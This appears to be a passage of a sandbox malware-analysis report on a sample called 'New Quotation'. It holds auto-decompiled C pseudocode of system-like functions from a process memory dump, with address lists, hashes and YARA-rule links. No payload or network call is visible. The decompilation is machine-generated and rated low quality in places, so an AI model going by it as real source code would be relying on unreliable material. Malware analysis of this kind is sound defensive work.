									_t54 = 0;
								}
								_t51 =  &(_t51[4]);
								_t41 = _t41 - 1;
								_v8 = _t41;
							} while (_t41 != 0);
							_t37 = _v12;
						}
						L8:
						_t37 = _t37 + 1;
						_t48 = 0x2a;
						_v12 = _t37;
					} while (_t37 < _t48);
					_t40 = _a8;
					if(_a12 == 1 &&  *_t40 < _t54) {
						_t58 = 0xc0000001;
					}
					goto L11;
				}
			}























                                                                                                                                                                                          0x1d7c9fdb
                                                                                                                                                                                          0x1d7c9fe0
                                                                                                                                                                                          0x1d82bd61
                                                                                                                                                                                          0x1d82bd61
                                                                                                                                                                                          0x1d7ca071
                                                                                                                                                                                          0x1d7ca073
                                                                                                                                                                                          0x1d7ca077
                                                                                                                                                                                          0x1d7ca077
                                                                                                                                                                                          0x1d7ca07d
                                                                                                                                                                                          0x1d7ca082
                                                                                                                                                                                          0x1d7ca082
                                                                                                                                                                                          0x1d7c9fe6
                                                                                                                                                                                          0x1d7c9feb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c9ff3
                                                                                                                                                                                          0x1d7c9ff6
                                                                                                                                                                                          0x1d7c9ff7
                                                                                                                                                                                          0x1d7ca000
                                                                                                                                                                                          0x1d82bcd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82bcd4
                                                                                                                                                                                          0x1d7ca017
                                                                                                                                                                                          0x1d7ca01b
                                                                                                                                                                                          0x1d82bcde
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ca021
                                                                                                                                                                                          0x1d7ca023
                                                                                                                                                                                          0x1d7ca025
                                                                                                                                                                                          0x1d7ca037
                                                                                                                                                                                          0x1d7ca085
                                                                                                                                                                                          0x1d7ca085
                                                                                                                                                                                          0x1d7ca039
                                                                                                                                                                                          0x1d7ca03b
                                                                                                                                                                                          0x1d7ca03d
                                                                                                                                                                                          0x1d7ca040
                                                                                                                                                                                          0x1d7ca045
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ca047
                                                                                                                                                                                          0x1d7ca04a
                                                                                                                                                                                          0x1d7ca051
                                                                                                                                                                                          0x1d82bced
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82bcf3
                                                                                                                                                                                          0x1d82bcf6
                                                                                                                                                                                          0x1d82bcf6
                                                                                                                                                                                          0x1d82bcf9
                                                                                                                                                                                          0x1d82bcfc
                                                                                                                                                                                          0x1d82bcff
                                                                                                                                                                                          0x1d82bd02
                                                                                                                                                                                          0x1d82bd04
                                                                                                                                                                                          0x1d82bd0b
                                                                                                                                                                                          0x1d82bd0d
                                                                                                                                                                                          0x1d82bd14
                                                                                                                                                                                          0x1d82bd25
                                                                                                                                                                                          0x1d82bd16
                                                                                                                                                                                          0x1d82bd19
                                                                                                                                                                                          0x1d82bd1c
                                                                                                                                                                                          0x1d82bd1e
                                                                                                                                                                                          0x1d82bd1e
                                                                                                                                                                                          0x1d82bd1c
                                                                                                                                                                                          0x1d82bd14
                                                                                                                                                                                          0x1d82bd28
                                                                                                                                                                                          0x1d82bd2e
                                                                                                                                                                                          0x1d82bd30
                                                                                                                                                                                          0x1d82bd38
                                                                                                                                                                                          0x1d82bd49
                                                                                                                                                                                          0x1d82bd3a
                                                                                                                                                                                          0x1d82bd3d
                                                                                                                                                                                          0x1d82bd40
                                                                                                                                                                                          0x1d82bd42
                                                                                                                                                                                          0x1d82bd42
                                                                                                                                                                                          0x1d82bd40
                                                                                                                                                                                          0x1d82bd38
                                                                                                                                                                                          0x1d82bd4c
                                                                                                                                                                                          0x1d82bd4c
                                                                                                                                                                                          0x1d82bd4e
                                                                                                                                                                                          0x1d82bd51
                                                                                                                                                                                          0x1d82bd54
                                                                                                                                                                                          0x1d82bd54
                                                                                                                                                                                          0x1d82bd59
                                                                                                                                                                                          0x1d82bd59
                                                                                                                                                                                          0x1d7ca057
                                                                                                                                                                                          0x1d7ca059
                                                                                                                                                                                          0x1d7ca05a
                                                                                                                                                                                          0x1d7ca05b
                                                                                                                                                                                          0x1d7ca05e
                                                                                                                                                                                          0x1d7ca067
                                                                                                                                                                                          0x1d7ca06a
                                                                                                                                                                                          0x1d7ca08c
                                                                                                                                                                                          0x1d7ca08c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ca06a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
                                                                                                                                                                                          • Instruction ID: 1f7f8858b0493f516e6310fe3267887ed88b28e63cbeb328f808bc69452b76c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F412531A01256EFDB01EE648444BBB7371FB40BB6FD6806BE9449B249E636ADC0C352
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A29CF Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 41%
                                                                                                                                                                                          			E1D8A29CF(signed int __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				void* _t45;
				signed int _t50;
				intOrPtr* _t54;
				signed int _t60;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr* _t65;
				intOrPtr* _t72;
				signed int _t73;
				void* _t74;
				void* _t76;
				intOrPtr* _t77;
				intOrPtr* _t80;
				void* _t82;

				_t63 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t80 = __ecx + 0x154;
				_v12 = __edx;
				_t72 =  *_t80;
				_a4 = _a4 -  *((intOrPtr*)(__edx + 0x30));
				_t76 = 0;
				_v20 = _t80;
				while(_t72 != _t80) {
					_t63 =  *(_t72 + 8) << 4;
					_t45 =  *((intOrPtr*)(_t72 + 0x14)) + 4 + ( *(_t72 + 8) << 4);
					if(_t76 <= _t45) {
						_t76 = _t45;
					}
					_t72 =  *_t72;
				}
				_t77 = E1D7E5D90(_t63,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t76);
				_v24 = _t77;
				if(_t77 != 0) {
					_t61 =  *_t80;
					_v16 = _t61;
					if(_t61 != _t80) {
						_v28 = _v12 + 0x58;
						do {
							 *_t77 =  *((intOrPtr*)(_t61 + 8));
							_t54 = _t61 + 0xc;
							_t65 =  *_t54;
							_push("true");
							_pop(_t73);
							_v8 = _t73;
							if(_t65 != _t54) {
								_t62 = _t77 + 4;
								do {
									_t73 = _t73 + 0x10;
									_t62 = _t62 + 0x10;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t65 =  *_t65;
								} while (_t65 != _t54);
								_t61 = _v16;
								_t80 = _v20;
								_t77 = _v24;
								_v8 = _t73;
							}
							E1D8188C0(_t73 + _t77, _t61 + 0x18,  *((intOrPtr*)(_t61 + 0x14)));
							_t82 = _t82 + 0xc;
							_push( &_v32);
							_push(_a4);
							_push( *((intOrPtr*)(_t61 + 0x14)) + _v8);
							_push(_t77);
							_push(_v28);
							_t74 = 0x43;
							_t60 = E1D80E134(_v12, _t74);
							_v8 = _t60;
							if(_t60 >= 0) {
								goto L14;
							}
							goto L15;
							L14:
							_t61 =  *_t61;
							_v16 = _t61;
							_a4 = _a4 - (_v32 + 0x00000007 & 0xfffffff8);
						} while (_t61 != _t80);
					}
					L15:
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t77);
					_t50 = _v8;
				} else {
					_t50 = 0xc0000017;
				}
				return _t50;
			}
























                                                                                                                                                                                          0x1d8a29cf
                                                                                                                                                                                          0x1d8a29dd
                                                                                                                                                                                          0x1d8a29e3
                                                                                                                                                                                          0x1d8a29e9
                                                                                                                                                                                          0x1d8a29ec
                                                                                                                                                                                          0x1d8a29ef
                                                                                                                                                                                          0x1d8a29f2
                                                                                                                                                                                          0x1d8a29f4
                                                                                                                                                                                          0x1d8a2a0f
                                                                                                                                                                                          0x1d8a29ff
                                                                                                                                                                                          0x1d8a2a05
                                                                                                                                                                                          0x1d8a2a09
                                                                                                                                                                                          0x1d8a2a0b
                                                                                                                                                                                          0x1d8a2a0b
                                                                                                                                                                                          0x1d8a2a0d
                                                                                                                                                                                          0x1d8a2a0d
                                                                                                                                                                                          0x1d8a2a24
                                                                                                                                                                                          0x1d8a2a26
                                                                                                                                                                                          0x1d8a2a2b
                                                                                                                                                                                          0x1d8a2a37
                                                                                                                                                                                          0x1d8a2a39
                                                                                                                                                                                          0x1d8a2a3e
                                                                                                                                                                                          0x1d8a2a4a
                                                                                                                                                                                          0x1d8a2a4d
                                                                                                                                                                                          0x1d8a2a50
                                                                                                                                                                                          0x1d8a2a52
                                                                                                                                                                                          0x1d8a2a55
                                                                                                                                                                                          0x1d8a2a57
                                                                                                                                                                                          0x1d8a2a59
                                                                                                                                                                                          0x1d8a2a5a
                                                                                                                                                                                          0x1d8a2a5f
                                                                                                                                                                                          0x1d8a2a61
                                                                                                                                                                                          0x1d8a2a64
                                                                                                                                                                                          0x1d8a2a69
                                                                                                                                                                                          0x1d8a2a6c
                                                                                                                                                                                          0x1d8a2a6f
                                                                                                                                                                                          0x1d8a2a70
                                                                                                                                                                                          0x1d8a2a71
                                                                                                                                                                                          0x1d8a2a72
                                                                                                                                                                                          0x1d8a2a73
                                                                                                                                                                                          0x1d8a2a75
                                                                                                                                                                                          0x1d8a2a79
                                                                                                                                                                                          0x1d8a2a7c
                                                                                                                                                                                          0x1d8a2a7f
                                                                                                                                                                                          0x1d8a2a82
                                                                                                                                                                                          0x1d8a2a82
                                                                                                                                                                                          0x1d8a2a90
                                                                                                                                                                                          0x1d8a2a9e
                                                                                                                                                                                          0x1d8a2aa1
                                                                                                                                                                                          0x1d8a2aa2
                                                                                                                                                                                          0x1d8a2aa8
                                                                                                                                                                                          0x1d8a2aa9
                                                                                                                                                                                          0x1d8a2aaa
                                                                                                                                                                                          0x1d8a2aaf
                                                                                                                                                                                          0x1d8a2ab0
                                                                                                                                                                                          0x1d8a2ab5
                                                                                                                                                                                          0x1d8a2aba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8a2abc
                                                                                                                                                                                          0x1d8a2abf
                                                                                                                                                                                          0x1d8a2ac7
                                                                                                                                                                                          0x1d8a2aca
                                                                                                                                                                                          0x1d8a2acd
                                                                                                                                                                                          0x1d8a2a4d
                                                                                                                                                                                          0x1d8a2ad5
                                                                                                                                                                                          0x1d8a2ae1
                                                                                                                                                                                          0x1d8a2ae6
                                                                                                                                                                                          0x1d8a2a2d
                                                                                                                                                                                          0x1d8a2a2d
                                                                                                                                                                                          0x1d8a2a2d
                                                                                                                                                                                          0x1d8a2aed

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
                                                                                                                                                                                          • Instruction ID: fc235b49688325d5cdfb63088756180e9efe482ea9f651a1af8fc9c08cadb6a4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7416276A00159EFCB25CF98C9C0BAEB7B5FF84754F158069E505AB241D730EA41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CEDFA Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E1D7CEDFA(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				unsigned int _t58;
				char _t63;
				unsigned int _t75;
				signed int _t80;
				intOrPtr* _t83;
				void* _t85;

				_push(0x18);
				_push(0x1d8abb78);
				E1D827BE4(__ebx, __edi, __esi);
				_t83 = __ecx;
				 *((intOrPtr*)(_t85 - 0x28)) = __ecx;
				 *((char*)(_t85 - 0x1a)) = 0;
				 *((char*)(_t85 - 0x19)) = 0;
				 *((intOrPtr*)(_t85 - 0x20)) = 0;
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if(( *(__ecx + 0x40) & 0x75010f61) != 0 || ( *(__ecx + 0x40) & 0x00000002) == 0 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					_t48 = 0;
					_t63 = 1;
				} else {
					_t63 = 1;
					_t48 = 1;
				}
				if(_t48 == 0) {
					_t80 = 0xc000000d;
					goto L18;
				} else {
					E1D7DFED0( *((intOrPtr*)(_t83 + 0xc8)));
					 *((char*)(_t85 - 0x19)) = _t63;
					if( *((char*)(_t83 + 0xea)) == 2) {
						_t48 =  *(_t83 + 0xe4);
					} else {
						_t48 = 0;
					}
					if(_t48 != 0) {
						_t80 = 0;
						goto L18;
					} else {
						if( *((intOrPtr*)(_t83 + 0xe8)) != 0) {
							_t80 = 0xc000001e;
							L18:
							 *((intOrPtr*)(_t85 - 0x20)) = _t80;
							L19:
							_t64 = 0xffff;
							L14:
							 *((intOrPtr*)(_t85 - 4)) = 0xfffffffe;
							E1D7CEF5F(_t48, _t64, _t83);
							 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0x10));
							return _t80;
						}
						 *((short*)(_t83 + 0xe8)) = _t63;
						 *((char*)(_t85 - 0x1a)) = _t63;
						_t75 =  *0x1d8c3928; // 0x4000
						_t72 = _t83;
						_t80 = E1D7D1C50(_t83, (_t75 >> 3) + 2);
						 *((intOrPtr*)(_t85 - 0x20)) = _t80;
						if(_t80 < 0) {
							goto L19;
						}
						E1D7D12F3(_t83,  *((intOrPtr*)(_t83 + 0xb4)), _t72);
						 *(_t83 + 0xe4) =  *(_t83 + 0xe4) & 0x00000000;
						 *((char*)(_t83 + 0xea)) = 0;
						_push( *((intOrPtr*)(_t83 + 0xc8)));
						E1D7DE740(_t83);
						 *((char*)(_t85 - 0x19)) = 0;
						_t74 = _t83;
						 *(_t85 - 0x24) = E1D7CEF79(_t83);
						E1D7DFED0( *((intOrPtr*)(_t83 + 0xc8)));
						 *((char*)(_t85 - 0x19)) = _t63;
						_t56 =  *(_t85 - 0x24);
						if(_t56 == 0) {
							_t80 = 0xc0000017;
							 *((intOrPtr*)(_t85 - 0x20)) = 0xc0000017;
						} else {
							 *(_t83 + 0xe4) = _t56;
							 *((short*)(_t83 + 0xea)) = 0x202;
							if((E1D7D0670() & 0x00010000) == 0) {
								_t58 =  *0x1d8c3928; // 0x4000
								 *(_t83 + 0x6c) = _t58 >> 3;
							}
						}
						_t64 = 0xffff;
						 *((intOrPtr*)(_t83 + 0xe8)) =  *((intOrPtr*)(_t83 + 0xe8)) + 0xffff;
						 *((char*)(_t85 - 0x1a)) = 0;
						 *((char*)(_t85 - 0x19)) = 0;
						_push( *((intOrPtr*)(_t83 + 0xc8)));
						_t48 = E1D7DE740(_t74);
						goto L14;
					}
				}
			}










                                                                                                                                                                                          0x1d7cedfa
                                                                                                                                                                                          0x1d7cedfc
                                                                                                                                                                                          0x1d7cee01
                                                                                                                                                                                          0x1d7cee06
                                                                                                                                                                                          0x1d7cee08
                                                                                                                                                                                          0x1d7cee0d
                                                                                                                                                                                          0x1d7cee10
                                                                                                                                                                                          0x1d7cee13
                                                                                                                                                                                          0x1d7cee16
                                                                                                                                                                                          0x1d7cee20
                                                                                                                                                                                          0x1d82db26
                                                                                                                                                                                          0x1d82db2a
                                                                                                                                                                                          0x1d7cee43
                                                                                                                                                                                          0x1d7cee45
                                                                                                                                                                                          0x1d7cee46
                                                                                                                                                                                          0x1d7cee46
                                                                                                                                                                                          0x1d7cee4a
                                                                                                                                                                                          0x1d82db30
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cee50
                                                                                                                                                                                          0x1d7cee56
                                                                                                                                                                                          0x1d7cee5b
                                                                                                                                                                                          0x1d7cee67
                                                                                                                                                                                          0x1d82db49
                                                                                                                                                                                          0x1d7cee6d
                                                                                                                                                                                          0x1d7cee6d
                                                                                                                                                                                          0x1d7cee6d
                                                                                                                                                                                          0x1d7cee71
                                                                                                                                                                                          0x1d82db54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cee77
                                                                                                                                                                                          0x1d7cee7e
                                                                                                                                                                                          0x1d82db37
                                                                                                                                                                                          0x1d82db3c
                                                                                                                                                                                          0x1d82db3c
                                                                                                                                                                                          0x1d82db3f
                                                                                                                                                                                          0x1d82db3f
                                                                                                                                                                                          0x1d7cef41
                                                                                                                                                                                          0x1d7cef41
                                                                                                                                                                                          0x1d7cef48
                                                                                                                                                                                          0x1d7cef52
                                                                                                                                                                                          0x1d7cef5e
                                                                                                                                                                                          0x1d7cef5e
                                                                                                                                                                                          0x1d7cee84
                                                                                                                                                                                          0x1d7cee8b
                                                                                                                                                                                          0x1d7cee8e
                                                                                                                                                                                          0x1d7cee9a
                                                                                                                                                                                          0x1d7ceea1
                                                                                                                                                                                          0x1d7ceea3
                                                                                                                                                                                          0x1d7ceea8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ceeb7
                                                                                                                                                                                          0x1d7ceebc
                                                                                                                                                                                          0x1d7ceec3
                                                                                                                                                                                          0x1d7ceeca
                                                                                                                                                                                          0x1d7ceed0
                                                                                                                                                                                          0x1d7ceed5
                                                                                                                                                                                          0x1d7ceed9
                                                                                                                                                                                          0x1d7ceee0
                                                                                                                                                                                          0x1d7ceee9
                                                                                                                                                                                          0x1d7ceeee
                                                                                                                                                                                          0x1d7ceef1
                                                                                                                                                                                          0x1d7ceef6
                                                                                                                                                                                          0x1d82db58
                                                                                                                                                                                          0x1d82db5d
                                                                                                                                                                                          0x1d7ceefc
                                                                                                                                                                                          0x1d7ceefc
                                                                                                                                                                                          0x1d7cef02
                                                                                                                                                                                          0x1d7cef15
                                                                                                                                                                                          0x1d7cef17
                                                                                                                                                                                          0x1d7cef1f
                                                                                                                                                                                          0x1d7cef1f
                                                                                                                                                                                          0x1d7cef15
                                                                                                                                                                                          0x1d7cef22
                                                                                                                                                                                          0x1d7cef27
                                                                                                                                                                                          0x1d7cef2e
                                                                                                                                                                                          0x1d7cef32
                                                                                                                                                                                          0x1d7cef36
                                                                                                                                                                                          0x1d7cef3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cef3c
                                                                                                                                                                                          0x1d7cee71

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0373faf154ffd257e1d2f99e3274bc482462336747be23b732389be7d50b4a11
                                                                                                                                                                                          • Instruction ID: 061057fc961206a50e8595c932c9a4c645602200a552ec4823ad86b70727c169
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0373faf154ffd257e1d2f99e3274bc482462336747be23b732389be7d50b4a11
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41E132A08B85CFDB51CF68D8143EEBBF2BF45324F56492ED18AA7250C7306945C79A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D807E71 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D807E71(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L23:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E1D7F10D0(0, _t61, 0x1d7a115c);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E1D7F10D0(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L20:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L20;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = E1D7E5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L23;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                                                                          0x1d807e7a
                                                                                                                                                                                          0x1d807e7e
                                                                                                                                                                                          0x1d807e83
                                                                                                                                                                                          0x1d807e8c
                                                                                                                                                                                          0x1d844994
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d844994
                                                                                                                                                                                          0x1d807e96
                                                                                                                                                                                          0x1d844983
                                                                                                                                                                                          0x1d807ecb
                                                                                                                                                                                          0x1d807ed1
                                                                                                                                                                                          0x1d807edd
                                                                                                                                                                                          0x1d807ee3
                                                                                                                                                                                          0x1d807eea
                                                                                                                                                                                          0x1d807ef2
                                                                                                                                                                                          0x1d807ef7
                                                                                                                                                                                          0x1d807efc
                                                                                                                                                                                          0x1d807f5b
                                                                                                                                                                                          0x1d807f5b
                                                                                                                                                                                          0x1d807f08
                                                                                                                                                                                          0x1d807f0c
                                                                                                                                                                                          0x1d807f11
                                                                                                                                                                                          0x1d807f33
                                                                                                                                                                                          0x1d807f39
                                                                                                                                                                                          0x1d807f3c
                                                                                                                                                                                          0x1d807f44
                                                                                                                                                                                          0x1d807f4b
                                                                                                                                                                                          0x1d807f4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d807f50
                                                                                                                                                                                          0x1d807f55
                                                                                                                                                                                          0x1d807f61
                                                                                                                                                                                          0x1d807f61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d807f61
                                                                                                                                                                                          0x1d807f57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d807f57
                                                                                                                                                                                          0x1d807f46
                                                                                                                                                                                          0x1d807f46
                                                                                                                                                                                          0x1d807f5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d807f13
                                                                                                                                                                                          0x1d807f13
                                                                                                                                                                                          0x1d807f13
                                                                                                                                                                                          0x1d807f18
                                                                                                                                                                                          0x1d807f1c
                                                                                                                                                                                          0x1d807f1e
                                                                                                                                                                                          0x1d807f21
                                                                                                                                                                                          0x1d807f24
                                                                                                                                                                                          0x1d807f24
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d807f27
                                                                                                                                                                                          0x1d807f11
                                                                                                                                                                                          0x1d844989
                                                                                                                                                                                          0x1d84498e
                                                                                                                                                                                          0x1d807ea7
                                                                                                                                                                                          0x1d807eb2
                                                                                                                                                                                          0x1d807eb7
                                                                                                                                                                                          0x1d807ebc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84499e
                                                                                                                                                                                          0x1d807ec4
                                                                                                                                                                                          0x1d807ec8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d807ec8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84498e
                                                                                                                                                                                          0x1d807e9c
                                                                                                                                                                                          0x1d807ea1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8449a8
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b46e693a0f6641d02cb665d07e080bc65c78f515b9ab7fdd1fad357ed89e5ccc
                                                                                                                                                                                          • Instruction ID: 5fb7eb975374098e67877195aaebc4ad6c775c5cc236a6c2e7d466246b8dd2b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: b46e693a0f6641d02cb665d07e080bc65c78f515b9ab7fdd1fad357ed89e5ccc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331CD31A006199BCB25DF29DC40A3B7BE1EF89B10B16806AF949DB360E770E841C792
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D7DB6 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E1D7D7DB6(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				signed char _t33;
				char* _t43;
				void* _t48;
				signed char _t62;
				void* _t63;
				void* _t80;
				void* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E1D7E3C40() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E1D8A4F1D(_v8, _t80);
					}
					L1D7E2330(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E1D7E24D0(_t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E1D8A49AD(_t83,  &_v16);
